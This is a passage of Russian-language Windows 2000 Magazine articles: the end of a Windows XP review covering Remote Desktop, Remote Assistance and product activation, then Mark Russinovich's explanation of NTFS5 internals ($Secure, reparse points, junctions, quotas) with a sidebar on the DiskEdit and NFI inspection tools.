служб системы поддержки XP Pro — Remote Desktop и Remote Assistance — у меня
никаких замечаний не было. Работа обеих служб основана на технологии Windows
2000 Server Terminal Services. Remote Desktop позволяет
управлять целевой XP-системой с удаленной машины. Это чрезвычайно
удобно, например, при подключении к офисной системе со своего домашнего
компьютера. Эта же технология дает возможность большему числу пользователей в
удаленном режиме регистрироваться и совместно использовать ресурсы одной
системы. Но перед тем, как XP разрешит установить
удаленное соединение, необходимо самостоятельно активизировать поддержку службы
Remote Desktop. Для этого нужно выставить флажок Enable Remote Desktop
(Start, Control Panel, Performance and Maintenance, System, Remote). Затем указанному числу пользователей предоставляется
разрешение работать со службой Remote Desktop. Чтобы с управляющей станции
обратиться к целевой системе, нужно выбрать пункт Remote Desktop Connection
(Start, All Programs, Accessories, Communications).
Хотя два пользователя с разными идентификаторами
(User ID) могут одновременно установить удаленное соединение с целевым
компьютером, один и тот же пользователь и локально, и удаленно в одно и то же
время зарегистрироваться на целевом компьютере не сможет. После того как
соединение установлено, рабочий стол Remote Desktop появляется в окне Terminal
Services на управляющей системе, а целевая система блокирует возможность
локальной работы. Но если локальный пользователь нажимает Ctrl+Alt+Del, то
удаленная сессия будет завершена. Производительность клиентских компьютеров при
проведении тестирования по LAN-соединениям оказалась весьма высокой.
Служба Remote Assistance начинает работать там,
где не работает Remote Desktop; она позволяет другим пользователям в удаленном
режиме просматривать экран или брать на себя управление в случае возникновения
проблем. Подобная возможность полезна для персонала службы поддержки (Help
Desk). Как и Remote Desktop, Remote Assistance использует протокол RDP службы
Terminal Services для отображения удаленного экрана. Для запуска Remote
Assistance следует воспользоваться или Windows Messenger, или электронной
почтой, чтобы обратить на себя внимание обслуживающего персонала. При
использовании Windows Messenger проверяется список доступных в данный момент
технических специалистов. После того как сообщение с просьбой о помощи
отправлено, специалист на своем рабочем месте получает соответствующий запрос.
На Экране 7 показан рабочий стол удаленного пользователя внутри окна Remote
Assistance.
|
Экран 7. Доступ к удаленной
системе с помощью Remote Desktop. |
Специалист службы технической поддержки может
либо пассивно наблюдать за происходящим на экране, либо взять управление на
себя. В последнем случае инициатор обращения получает запрос на передачу
функций управления в удаленном режиме. После того как пользователь ответит ОК,
специалист получает возможность в удаленном режиме управлять системой
пользователя. Чтобы завершить удаленную сессию, пользователю достаточно нажать
Esc. Remote Assistance поддерживает передачу голосовых данных, благодаря чему
пользователь моментально получает обратную связь, не поднимая телефонной
трубки. Кроме того, с помощью Remote Assistance можно посылать файлы: например,
при передаче для анализа отчета программы сетевой диагностики.
Для пользователей Windows Me и Windows 9x
переход на XP Home или XP Pro позволит обеспечить более высокий уровень
стабильности и функциональности системы. Пользователи NT в свою очередь получат
преимущества при использовании нового интерфейса и системных утилит, а также
смогут добиться более высокого уровня совместимости работающих приложений и
сокращения времени загрузки.
Для пользователей Windows 2000 вопрос с
переходом на XP решить сложнее: Windows 2000 имеет со-поставимую
с XP стабильность и производительность. Однако для тех, кто заинтересован в
возможности работы в удаленном режиме, организации конференций Windows
Messenger, а также для мобильных пользователей переход на XP имеет свои
неоспоримые преимущества.
Майкл Оти – научный редактор американского
журнала Windows NT Magazine, президент компании TECA, специализирующейся на
разработке программного обеспечения и оказании консультационных услуг. С ним
можно связаться по адресу: mikeo@teca.com.
Если, приобретая Windows XP, пользователь
выбирает лицензионное соглашение видов Microsoft Open, Select или Enterprise,
ему нет нужды заботиться о процедуре активации продукта — Windows Product
Activation (WPA). При анализе ключа продукта, связанного с этими лицензиями,
система обходит процедуру активации (лицензионная политика Microsoft описана в
статье на сайте Microsoft. http://www.microsoft.com/business/licensing).
Аналогичное замечание справедливо и для копий XP, предустановленных на
OEM-системы, в которых активация была проведена заранее, и в процессе
начального развертывания ОС никаких вопросов на тему активации задано не будет.
Следует, однако, иметь в виду, что, если в аппаратном обеспечении было
произведено более четырех изменений, система потребует повторной активации
продукта. Приобретая Windows XP в магазине (retail version), следует заранее
быть готовым в конце процесса установки ответить на вопрос об активации
продукта, а также зарегистрировать его (дополнительное требование).
Для автоматической активации копии XP необходимо
Internet-соединение. Программа активации отсылает уникальный идентификационный
код системы в Microsoft. В ответ возвращается некоторый ключ, который
активирует операционную систему. XP использует данные об аппаратной
конфигурации, а также значение номера Product Activation Key, который
пользователь вводил в процессе установки, для генерации указанного ключа. Если
Internet-соединение отсутствует, для завершения процесса активации следует
позвонить в Microsoft по номеру, указанному на экране программы Windows Product
Activation Wizard. Microsoft предоставляет 30-дневную отсрочку для выполнения
этой процедуры, а по истечении установленного срока XP возвращается к экрану
Welcome и предлагает завершить процедуру активации.
Хотя разработчики не разглашают всех
подробностей WPA, утверждается, что процедура активации не передает никакой
персональной информации о клиенте в Microsoft. Одна из фирм-разработчиков
исследовала процедуру WPA и опубликовала результаты с подробным описанием (см. http://www.licenturion.com/xp).
Служба автоматического восстановления ASR
Клиент для NetWare
Работа в домене
Поддержка двух процессоров
Динамические диски
Шифрование EFS
Управление доступом на уровне файлов
Групповые политики
Автоустановка приложений IntelliMirror
Протокол IPSecurity (IPSec)
Поддержка многонационального интерфейса
Автономные папки
Удаленное управление Remote Desktop
Удаленная установка RIS
Перемещаемые профили
Протокол SNMP
NTFS, собственная файловая
система Windows 2000, непрерывно совершенствовалась со времени выпуска Windows
NT 3.1. Она изначально обладала возможностями высокоуровневой файловой системы,
но в Windows 2000 появились важные изменения, которые были сделаны в связи с
необходимостью решать проблемы, возникающие на корпоративном уровне при
переходе организаций на NT. Например, благодаря консолидации информации о
безопасности повышается эффективность повседневной работы с NTFS; другие
функции, такие, как управление квотами, должны использоваться в прикладных
программах или активизироваться и применяться администратором.
На этот раз я расскажу о
возможностях версии NTFS 5.0 (NTFS5), вошедшей в состав Windows 2000, и о
влиянии новых функций на поведение и формат диска NTFS. Приступая к чтению
статьи, важно четко понимать основные принципы построения дисковой структуры
NTFS, а также иметь представление о главной таблице файлов (Master File Table,
MFT), типах атрибутов и резидентных и нерезидентных атрибутах. Подробно основы
NTFS описаны в статье Шона Дейли «NTFS5 против FAT32» (Windows 2000 Magazine/RE
№4, 2000). Во врезке «Исследуем
дисковые структуры NTFS» рассказано о некоторых инструментах
просмотра и источниках информации об элементах внутренней структуры данных
NTFS.
Некоторые новые свойства NTFS5 основываются
на фундаментальной особенности NTFS, именуемой индексацией атрибутов (attribute
indexing). Индексация атрибутов заключается в сортировке элементов с атрибутом
определенного типа при помощи эффективного механизма хранения, обеспечивающего
быстрый просмотр. В версиях NTFS, предшествовавших Windows 2000, индексация
допускалась только для индексного атрибута $I30, в котором хранятся элементы
каталога. В процессе индексации атрибутов элементы каталога сортируются по
имени и сохраняются в B+ дереве (форма двоичного дерева, в каждом узле которого
хранится несколько элементов). На Рисунке 1 показана запись MFT каталога, в
трех узлах которой содержится девять элементов, по три в каждом узле. Корень B+
дерева находится в атрибуте index root (корень индекса). В записи MFT каталога
девять элементов не умещается, поэтому некоторые элементы приходится хранить в
другом месте. Для этого NTFS выделяет два буфера размещения индексов (index
allocation) для хранения двух записей (как правило, корень индекса и буферы
размещения индексов мо-гут хранить элементы для более чем трех файлов, в зависимости от длины имен). Размер записи
MFT — 1 Кбайт, а размер буферов размещения индексов — 4 Кбайт.
Красные стрелки указывают, что
элементы NTFS хранятся в алфавитном порядке. Если запустить программу, которая
открывает файл e.bak в показанном на рисунке каталоге, то NTFS читает атрибут
индексного корня, содержащий элементы для d.new, h.txt и i.doc, и сравнивает
строку e.bak с именем первого элемента, d.new. NTFS делает вывод, что
алфавитный номер e.bak больше, чем d.new, и переходит к следующему элементу —
h.txt. Повторив операцию сравнения, NTFS выясняет, что алфавитный номер e.bak
меньше, чем h.txt. Затем NTFS отыскивает в записи каталога h.txt номер
виртуального кластера (virtual cluster number, VCN) индексного буфера,
содержащего элементы каталога, алфавитные номера которых меньше, чем h.txt, но
больше, чем d.new. VCN представляет собой порядковый номер кластера в файле или
каталоге. На основании информации о размещении кластеров NTFS преобразует VCN в
логический номер кластера (Logical Cluster Number, LCN), т. е. номер кластера
относительно начала тома. Если элемент каталога для h.txt не содержит VCN
индексного буфера, NTFS делает вывод, что каталог h.txt не содержит файла e.bak
и сообщает о неудачном завершении поиска.
Получив VCN начального кластера
индексного буфера, NTFS читает буфер размещения индексов и просматривает его в
поисках совпадений. На Рисунке 1 первый же элемент индексного буфера совпадает
с критерием поиска, и NTFS читает номер записи MFT e.bak из элемента каталога
e.bak. В элементах каталога хранится и другая информация: в частности,
временные отметки (например, время создания и последнего изменения), размер и
атрибуты. NTFS хранит эту информацию и в записи MFT файла, но, благодаря
дублированию информации в элементе каталога, читать запись MFT файла при
составлении списков каталогов и выполнении простых файловых запросов не
требуется.
Элементы каталогов сортируются
по алфавиту, и именно поэтому в списках каталогов NTFS файлы всегда
располагаются в алфавитном порядке. В отличие от NTFS, FAT не сортирует
каталог, поэтому списки FAT не сортированы. Кроме того, поскольку элементы NTFS
хранятся в B+ дереве, механизм поиска конкретных файлов в больших каталогах
очень эффективен; обычно достаточно просмотреть лишь часть каталога. Данный
подход отличается от линейного метода FAT, при использовании которого для
поиска одного имени иногда приходится просматривать весь каталог.
В версиях NTFS,
предшествовавших Windows 2000, индексировались только имена файлов, но NTFS5
обеспечивает универсальную индексацию, сохраняя в индексах произвольные данные
и сортируя элементы данных не по имени, а по другим параметрам. Универсальная
индексация используется для управления дескрипторами безопасности, информацией
о квотах, точках повторной обработки и идентификаторах файловых объектов, т. е.
элементами NTFS5, о которых идет речь в данной статье.
NTFS всегда располагала
функциями безопасности, позволяющими администратору указать пользователей,
которым разрешен или запрещен доступ к тем или иным файлам и каталогам. В
версиях NTFS, предшествовавших Windows 2000, дескриптор безопасности каждого
файла и каталога хранился в его собственном атрибуте безопасности. В большинстве
случаев администраторы назначают единые параметры безопасности всему дереву
каталогов, что приводит к дублированию дескрипторов безопасности для всех
файлов и подкаталогов, к которым применяются параметры. Такое дублирование
может привести к значительным потерям дискового пространства в
многопользовательских средах, таких, как Windows 2000 Server Terminal Services
и NT Server 4.0, Terminal Server Edition (WTS), где дескрипторы безопасности
могут содержать элементы для многих учетных записей. NTFS5 оптимизирует
выделение дискового пространства для хранения дескрипторов безопасности,
сохраняя лишь один экземпляр каждого дескриптора безопасности на томе в
центральном файле метаданных с именем $Secure.
|
Рисунок 2.
Как работает файл метаданных $Secure. |
В файле $Secure хранятся два
индексных атрибута — $SDH и $SII — и атрибут потока данных, именуемый $SDS (см.
Рисунок 2). NTFS5 назначает каждому уникальному дескриптору на томе внутренний
идентификатор безопасности NTFS (не путать с SID, уникально идентифицирующим
компьютеры и учетные записи пользователей) и хеширует дескриптор безопасности в
соответствии с простым хеш-алгоритмом. Хеш-значение — потенциально неуникальное
сокращенное представление дескриптора. Элементы в индексе $SDH отображают
хеш-значения дескриптора безопасности на область хранения дескриптора
безопасности в атрибуте данных $SDS, а индекс $SII отображает на область
хранения дескриптора безопасности в атрибуте данных $SDS идентификаторы
безопасности NTFS5.
Назначив дескриптор
безопасности файлу или каталогу, NTFS получает хеш-значение дескриптора и
просматривает индекс $SDH в поисках совпадений. NTFS сортирует элементы индекса
$SDH согласно хеш-значению соответствующего дескриптора безопасности и
сохраняет элементы в B+ дереве. Обнаружив для дескриптора совпадение в индексе
$SDH, NTFS определяет смещение дескриптора безопасности элемента из записи $SDS
Offset и считывает дескриптор безопасности из атрибута $SDS. Если совпадают
хеш-значения, но не дескрипторы безопасности, то NTFS ищет еще один совпадающий
элемент в индексе $SDH. Если NTFS обнаруживает полное совпадение, то файл или
каталог, которому назначен дескриптор безопасности, может установить связь с
дескриптором безопасности в атрибуте $SDS.
NTFS устанавливает связь,
считывая идентификатор безопасности из элемента $SDH и сохраняя его в атрибуте
$STANDARD_INFORMATION файла или каталога. В атрибуте $STANDARD_INFORMATION
системы NTFS, который имеют все файлы и каталоги, хранится базовая информация о
файле, в том числе атрибуты и временные метки. В Windows 2000 этот атрибут
расширен, в нем появилась дополнительная информация, например идентификатор
безопасности файла.
Если NTFS не
обнаруживает в индексе $SDH элемента с дескриптором безопасности, совпадающим с
назначаемым, значит, новый дескриптор уникален для тома, и NTFS назначает ему
новый внутренний ID безопасности. Внутренние ID безопасности NTFS представляют собой 32-разрядные
величины, а идентификаторы SID обычно в несколько раз длиннее, поэтому
представление идентификаторов SID идентификаторами безопасности NTFS позволяет
сэкономить место в атрибуте $STANDARD_INFORMATION. Затем NTFS добавляет
дескриптор безопасности в атрибут $SDS, который сортируется в B+ дереве по ID
безопасности NTFS, и дополняет индексы $SDH и $SII элементами, указывающими на
смещение дескриптора в массиве данных $SDS.
Когда приложение пытается
открыть файл или каталог, NTFS отыскивает дескриптор безопасности файла или
каталога с помощью индекса $SII.
NTFS читает внутренний ID
безопасности файла или каталога из атрибута $STANDARD_INFORMATION записи MFT, а
затем использует индекс $SII файла $Secure для поиска элемента ID в атрибуте
$SDS. По смещению в атрибуте $SDS система NTFS считывает дескриптор
безопасности и завершает проверку безопасности. NTFS5 не удаляет элементы файла
$Secure, даже если с ним не связано ни одного файла или каталога на томе.
Наличие неудаленных элементов не приводит к значительной потере дискового
пространства, так как число уникальных дескрипторов безопасности на большинстве
томов, даже используемых в течение длительного времени, сравнительно невелико.
Благодаря универсальной
индексации NTFS5 файлы и каталоги с одинаковыми параметрами безопасности
эффективно используют общие дескрипторы. С помощью индекса $SII NTFS быстро
отыскивает дескрипторы безопасности в файле $Secure в ходе проверок
безопасности, а индекс $SDH позволяет быстро определить, имеется ли в файле
$Secure ранее сохраненный дескриптор безопасности, пригодный для совместного
использования с данным файлом или каталогом.
Точки повторной обработки
позволяют приложению связать блок своих данных с файлом или каталогом, а
диспетчеру объектов Object Manager — выполнить повторный поиск имени, когда
прикладная программа обнаруживает точку повторной обработки. Помимо данных в
точке повторной обработки хранится программный код, который идентифицирует
принадлежность точки повторной обработки определенному приложению. Сами по себе
точки повторной обработки бесполезны, но благодаря им
программисты могут наращивать функциональность NTFS. В Windows 2000
предусмотрено несколько типов точек повторной обработки, в том числе точки монтирования
томов, подсоединения каталогов NTFS и управления иерархическими
хранилищами данных (Hierarchical Storage Management, HSM). Я объясню, как
работают все эти функции, а затем подробно расскажу о реализации точек
повторной обработки.
Любой том NTFS доступен лишь
после того, как ему присвоено символьное обозначение. Точки монтирования NTFS5
позволяют привязать том к каталогу монтирования на родительском томе NTFS5, не
присваивая символьного обозначения дочернему тому. В результате появляется
возможность объединить несколько томов под одной буквой. Например, если
смонтировать том, содержащий каталог \articles, к точке монтирования с именем
C:\documents, то можно использовать путь C:\articles\documents для доступа к
файлам каталога \documents. Точка монтирования представляет собой точку
повторной обработки, данные которой состоят из
внутреннего имени тома. Внутреннее имя имеет форму \??\Volume{XX-XX-XX-XX}, где
X — числа, образующие глобальный уникальный ID (GUID), присвоенный тому
операционной системой.
Если открыть файл
C:\articles\documents\column.doc, то NTFS обнаруживает точку монтирования,
связанную с каталогом \documents. NTFS читает хранящиеся в ней данные точки
повторной обработки (имя тома) и передает в Object Manager статус точки
повторной обработки. Диспетчер ввода/вывода перехватывает информацию о статусе,
анализирует данные и определяет, что NTFS обнаружила точку монтирования.
Диспетчер ввода/вывода изменяет искомое имя и заставляет Object Manager
(компонент ядра, который отвечает поиску имен) провести повторный поиск с
измененным путем \??\Volume{GUID}\documents\column.doc. В процессе повторного
поиска анализ имени \documents\co-lumn.doc продолжится на смонтированном томе.
Создать точки монтирования и составить их список можно с помощью оснастки Disk
Management консоли управления Microsoft Management Console (MMC) или
инструмента командной строки Mountvol, поставляемого вместе с Windows 2000.
Точки подсоединения каталогов
NTFS похожи на точки монтирования, и диспетчер ввода/вывода и Object Manager
выполняют подсоединение так же, как монтирование. Однако точки подсоединения
устанавливают связь с каталогами, а не с томами. Точки подсоединения Windows
2000 эквивалентны символьным ссылкам UNIX (но в отличие от символьных ссылок
UNIX, точки подсоединения нельзя применять к файлам). Если создать точку
подсоединения C:\articles\documents, связанную с каталогом D:\documents, то
можно обращаться к файлам в D:\documents, используя путь C:\articles\documents.
В точке подсоединения хранится информация о перенаправленном пути, и если NTFS
обнаруживает точку подсоединения, то, как и в случае с точкой монтирования,
диспетчер ввода/вывода изменяет имя и инициирует повторный поиск имени. Принцип
действия точки подсоединения показан на Рисунке 3. Когда приложение открывает
C:\directory1\file, NTFS обнаруживает точку повторной обработки в каталоге
C:\directory1, указывающую на каталог C:\directory2. Диспетчер ввода/вывода
изменяет имя на C:\directory2\file, и приложение в итоге открывает файл
C:\directory2\file.
|
Рисунок 3.
Пример точки повторной обработки. |
В Windows 2000 нет инструментов
для создания точек подсоединения, и Microsoft официально не поддерживает такие
инструменты, так как использование путей с подсоединением может нарушить работу
некоторых прикладных программ. Однако создавать подсоединения и составлять их
списки можно с помощью инструмента Linkd из набора ресурсов Microsoft Windows
2000 Resource Kit или бесплатной утилиты Junction (http://www.sysinternals.com/misc.htm).
Повторный анализ пути
используется не во всех точках повторной обработки. В системе HSM точки
повторной обработки HSM служат для прозрачной миграции редко используемых
файлов в резервное хранилище данных. Когда HSM переносит файл в архив,
содержимое файла удаляется, а на его месте создается точка повторной обработки.
В данных точки повторной обработки содержится информация, используемая системой
HSM для поиска файла на архивном носителе. Если впоследствии приложение
обращается к хранящемуся в HSM файлу, то HSM-драйвер RsFilter.sys (Remote
Storage Filter — фильтр удаленного хранения данных) перехватывает код повторной
обработки, пересылаемый NTFS в Object Manager. Драйвер удаляет точку повторной
обработки, извлекает файл с архивного носителя, а затем повторяет
первоначальный запрос. На этот раз NTFS обращается к файлу, как к любому
другому, и операции по перемещению данных не влияют на работу приложения.
Если точка повторной обработки
связана с файлом или каталогом, то NTFS создает для нее атрибут с именем
$Reparse. В этом атрибуте хранятся код и данные точки повторной обработки.
Поэтому NTFS без труда обнаруживает все точки повторной обработки на томе, а в
файле метаданных с именем \$Extend\$Reparse хранятся элементы, связывающие
номера записи MTF файла и каталога точки повторной обработки с ассоцированными
с ними кодами повторной обработки. NTFS сортирует элементы по номеру записи MTF
в индексе $R.
|
Экран
1. Активизация квотирования. |
Системы Windows 2000 Server и
NT Server часто используются в качестве файл-серверов. Слабое место NT —
отсутствие у системного администратора встроенных инструментов для отслеживания
и ограничения дискового пространства на сервере, занимаемого отдельными
пользователями. Чтобы устранить этот пробел в функциональности NT, независимые
поставщики выпускают несколько продуктов для управления квотами. Но в Windows
2000 уже есть базовые функции квотирования, которые во многих случаях позволяют
обойтись без дополнительных инструментов. Функции управления квотами Windows
2000 построены на базе механизма квотирования NTFS (на томах FAT квоты выделить
нельзя) в соответствии с моделью обслуживания отдельных томов и пользователей.
Иными словами, администратор может использовать интерфейс, показанный на Экране
1, чтобы указать предупреждения и ограничить дисковое пространство,
предоставляемое в распоряжение пользователя на томе NTFS.
|
Рисунок 4.
Как работает файл метаданных $Quota. |
NTFS хранит информацию о
квотировании в файле метаданных \$Extend\$Quota, состоящих из индексов $O и $Q.
На Рисунке 4 показана структура этих индексов. Точно так же, как NTFS назначает
каждому дескриптору безопасности уникальный внутренний
ID безопасности, каждому пользователю назначается уникальный ID пользователя.
Когда администратор определяет информацию о квоте для пользователя, NTFS
назначает ID пользователя, соответствующий идентификатору SID пользователя. В
индексе $O создается запись, которая отображает SID на ID пользователя, индекс
сортируется по ID пользователя; в индексе $Q создается запись для управления
квотой. Запись управления квотой содержит величину квоты, выделенной
пользователю, а также размер занимаемого дискового пространства.
Когда приложение создает файл
или каталог, NTFS получает SID пользователя программы и отыскивает
соответствующий ID пользователя в индексе $O. NTFS записывает ID пользователя в
атрибут $STANDARD_INFORMATION нового файла или каталога и засчитывает все
дисковое пространство, выделенное файлу или каталогу, в счет квоты
пользователя. Затем NTFS отыскивает элемент квоты в индексе $Q и определяет, не
превысил ли пользователь своего порога предупреждения или дискового лимита.
Если выделение нового пространства привело к превышению порога, то NTFS
принимает соответствующие меры: например, заносит запись в журнал системных
событий или запрещает пользователю создать файл или каталог. По мере изменения
размера файла или каталога NTFS обновляет запись управления квотой, связанную с
ID пользователя в атрибуте $STANDARD_INFORMATION. Система NTFS использует метод
универсальной индексации для эффективной привязки ID пользователя к SID учетной
записи и быстрого поиска информации о квоте пользователя по его идентификатору.
Рассказом о квотировании
заканчивается первая часть данной статьи. Во второй части мы продолжим
знакомство с новыми возможностями NTFS: механизмом отслеживания распределенных
связей и изменений томов, функциями для работы с разреженными файлами и
шифрования данных.
Марк Русинович — доктор
философии, редактор Windows 2000 Magazine. С ним можно связаться по адресу: mark@sysinternals.com или http://www.sysinternals.com/.
Для исследования внутренних
дисковых структур NTFS существует несколько общедоступных инструментов. Среди них
— DiskEdit, встроенный инструмент тестирования NTFS, по недосмотру Microsoft
оказавшийся на компакт-диске Windows NT 4.0 Service Pack 4 (SP4), одна из самых
мощных известных мне программ просмотра NTFS. DiskEdit, окно
которого представлено на Экране A, позволяет ознакомиться со структурами,
образующими файлы и каталоги, а также с данными атрибутов и преобразовать пути
файлов и каталогов во входные коды таблицы MFT. Документация по DiskEdit
отсутствует, но я опубликовал учебное пособие в сборнике бесплатных бюллетеней
Sysinternals Newsletter (http://www.sysinternals.com/newsletter.htm).
Чтобы использовать DiskEdit вместе с Windows 2000, необходимо скопировать файлы
ifsutil.dll, ulib.dll, untfs.dll и ufat.dll из каталога \winnt\system32 системы
Windows NT в каталог, в котором нужно разместить DiskEdit.
|
Экран A.
Утилита DiskEdit. |
Те, у кого
нет компакт-диска с SP4, могут воспользоваться утилитой NTFS File Sector
Information Utility (NFI), поставляемой Microsoft в составе пакета OEM Support
Tools по адресу: http:\\support.microsoft.com/support/
kb/articles/q253/0/66.asp (помимо NFI в пакете OEM Support Tools
имеются утилиты отладки и расширения отладчика ядра, с помощью которых администраторы
и программисты могут анализировать аварийные дампы).
С помощью запускаемых из
командной строки шаблонов NFI можно собрать информацию о конкретном файле или
каталоге или обо всех файлах на томе, найти файл или каталог, в котором
расположен данный логический сектор диска, а также отыскать файл или каталог,
содержащий конкретный физический сектор. Например, команда
nfi C: 123
сообщает имя файла на томе C:,
который содержится в 123 секторе тома. Чтобы исследовать структуры данных NTFS,
можно воспользоваться этой же командой, не указывая номер сектора, и NFI выдаст
подробную информацию об атрибутах всех файлов на диске. Можно ввести имя файла
метаданных, описанных в статье, и просмотреть содержащиеся в них атрибуты.
Например, если выполнить команду
nfi c:\$extend\$quota
на квотируемом томе, то будет
видно, что файл $Quota содержит индексы с именами $O и $Q:
File 24
\$Extend\$Quota
$STANDARD_INFORMATION (resident)
$FILE_NAME (resident)
$INDEX_ROOT $O (resident)
$INDEX_ROOT $Q (resident)
Еще один источник информации о дисковой структуре NTFS
— книга Гэри Неббета «Windows NT/2000 Native API reference» (издательство New Readers
Publishing, 2000). В
приложении приведены определения многих дисковых структур NTFS (в некоторых
случаях отражены изменения, внесенные в Windows 2000) и содержится исходный
текст Win32-программы, с помощью которой можно
получить доступ к структурам данных в обход драйвера файловой системы NTFS и
создать дамп содержимого тома.